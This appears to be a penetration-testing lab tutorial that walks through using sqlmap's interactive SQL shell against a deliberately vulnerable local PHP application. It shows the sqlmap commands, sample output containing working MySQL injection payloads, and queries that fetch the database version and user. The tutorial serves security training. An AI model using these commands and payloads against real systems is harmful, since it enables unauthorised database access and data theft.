Use the Interactive SQL Shell in sqlmap

Introduction

In this lab, you will explore one of the most powerful features of sqlmap: the interactive SQL shell. sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

While sqlmap can automate data extraction, the --sql-shell option provides you with direct, interactive access to the backend database. This allows you to run custom SQL queries, giving you greater flexibility and control during a penetration test. You will learn how to establish an injection, launch the shell, and execute commands to interrogate the database.

Establish a Successful Injection on a Target

In this step, you will use sqlmap to scan a web application and confirm that it is vulnerable to SQL injection. Our setup script has already created a simple, vulnerable PHP application running on the local Apache server. We need to point sqlmap to the target URL and let it perform the initial analysis.

First, run the following sqlmap command in your terminal. We use the -u flag to specify the target URL and --batch to run in non-interactive mode, accepting all default answers.

sqlmap -u "http://127.0.0.1/index.php?id=1" --batch

sqlmap will perform a series of tests. Wait for it to complete. The output will show that the GET parameter id is vulnerable. This confirmation is the necessary first step before we can proceed to exploitation.

You should see output similar to this, confirming the vulnerability:

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1421=1421

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71627a7671,(SELECT (ELT(2521=2521,1))),0x71787a7171,0x78))s), 8446744073709551610, 8446744073709551610)))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 2112 FROM (SELECT(SLEEP(5)))mrzs)
---
[15:30:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.52, PHP 8.1.2
back-end DBMS: MySQL >= 5.0
[15:30:00] [INFO] fetched data logged to text files under '/home/labex/.local/share/sqlmap/output/127.0.0.1'

Launch the Interactive SQL Shell with `--sql-shell`

In this step, you will use the --sql-shell option to gain an interactive SQL prompt on the target database. Now that you've confirmed the injection point, you can instruct sqlmap to provide you with direct access.

Run the same sqlmap command as before, but this time, replace the --batch option with --sql-shell.

sqlmap -u "http://127.0.0.1/index.php?id=1" --sql-shell

sqlmap will re-confirm the injection and then present you with a special prompt: sql-shell>. This indicates that you are now in an interactive session with the backend database. Any valid SQL query for the target DBMS (which we know is MySQL) can be executed from this prompt.

The output will look like this:

[15:35:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.52, PHP 8.1.2
back-end DBMS: MySQL >= 5.0
[15:35:00] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>

Execute a Custom SQL Query like `SELECT @@version`

In this step, you will execute your first command in the interactive SQL shell. This will demonstrate your ability to directly query the database. A common first query is to check the database version.

At the sql-shell> prompt, type the following SQL query and press Enter. Remember to include the semicolon at the end.

SELECT @@version;

sqlmap will take your query, inject it into the vulnerable parameter, send it to the server, and return the result to you. The @@version variable in MySQL returns a string containing the database server version.

You will see the database version printed directly to your console:

sql-shell> SELECT @@version;
[15:40:01] [INFO] fetching MySQL version
[15:40:01] [INFO] retrieved: 8.0.xx-0ubuntu0.22.04.x
8.0.xx-0ubuntu0.22.04.x

Execute Another Custom Query like `SELECT user()`

In this step, you will run another query to further explore the database. This reinforces the concept of interactive control. Let's find out which database user the web application is using to connect to the database.

At the sql-shell> prompt, type the SELECT user() query and press Enter.

SELECT user();

This command asks the database to return the username and host of the current session. This is valuable information for understanding the privilege level of your injection.

The output will show the database user, which we configured in the setup script:

sql-shell> SELECT user();
[15:42:10] [INFO] fetching current user
[15:42:10] [INFO] retrieved: labex@localhost
labex@localhost

Exit the Interactive SQL Shell and Return to the Terminal

In this final step, you will learn how to properly exit the interactive SQL shell and return to your standard terminal prompt.

To exit the sql-shell>, simply type exit or quit and press Enter.

exit

sqlmap will close the session and return you to the ~/project directory in your Zsh terminal. This concludes the interactive session with the database.

The output will confirm that the session is ending:

sql-shell> exit
[15:45:00] [INFO] quitting
[15:45:00] [INFO] shutting down at 15:45:00

[*] shutting down...
labex@vnc-ubuntu:~/project$

You have now successfully used sqlmap's interactive shell to execute custom queries and have returned to your regular command line.

Summary

In this lab, you have successfully learned how to use one of sqlmap's most powerful features, the interactive SQL shell.

You began by identifying a SQL injection vulnerability in a target application using a basic sqlmap scan. Then, you leveraged this vulnerability by launching an interactive session with the --sql-shell flag. Inside this shell, you executed custom SQL queries like SELECT @@version; and SELECT user(); to directly interrogate the database and retrieve information. Finally, you learned how to exit the shell and return to your terminal. This skill is essential for any penetration tester who needs fine-grained control over a compromised database.